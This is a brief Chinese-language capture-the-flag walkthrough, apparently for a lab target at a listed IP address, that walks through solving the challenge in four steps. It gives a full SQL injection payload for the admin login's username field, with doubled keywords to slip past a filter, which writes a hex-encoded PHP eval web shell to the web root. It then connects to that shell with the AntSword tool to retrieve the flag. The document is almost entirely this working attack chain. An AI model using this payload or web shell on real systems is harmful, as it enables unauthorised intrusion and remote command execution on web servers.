1.打开页面
2.扫描到登录口
http://124.70.71.251:47601/admin/login.php
登录用户名处用burp插入payload
admin' uni union on selselectect null,null,null,null,0x3c3f70687020406576616c28245f504f53545b636d645d293b3f3e in into outoutfilefile '/var/www/html/shell.php'#
3.蚁剑连接,url:http://124.70.71.251:47601/shell.php,密码cmd
4.根目录找到key